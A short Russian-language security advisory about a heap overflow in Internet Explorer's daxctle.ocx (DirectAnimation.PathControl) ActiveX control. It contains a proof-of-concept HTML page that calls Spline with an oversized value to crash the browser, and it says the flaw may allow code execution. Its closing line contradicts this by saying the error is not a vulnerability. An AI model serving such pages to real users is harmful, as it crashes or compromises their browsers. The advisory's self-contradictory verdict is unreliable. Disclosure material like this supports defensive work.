Переполнение динамической памяти в Microsoft Internet Explorer

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании.

Уязвимость существует из-за недостаточной проверки входных данных в ActiveX компоненте 'daxctle.ocx'. Удаленный пользователь может с помощью дескриптора DirectAnimation.PathControl вызвать переполнение динамической памяти и аварийно завершить работу браузера или выполнить произвольный код на целевой системе. Пример:

<!--// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx
--!>
<html>
	<head>
	<title>test</title>
	</head>
	<body>
		<script>
			var target = new ActiveXObject("DirectAnimation.PathControl");
			target.Spline(0xffffffff, 1);
		</script>
	</body>
</html>

URL производителя: www.microsoft.com

Решение: Данная ошибка не является уязвимостью.